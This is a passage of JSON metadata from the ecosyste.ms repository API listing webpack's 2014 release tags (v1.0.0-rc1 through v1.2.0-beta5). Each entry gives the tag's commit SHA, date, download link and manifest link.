ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webp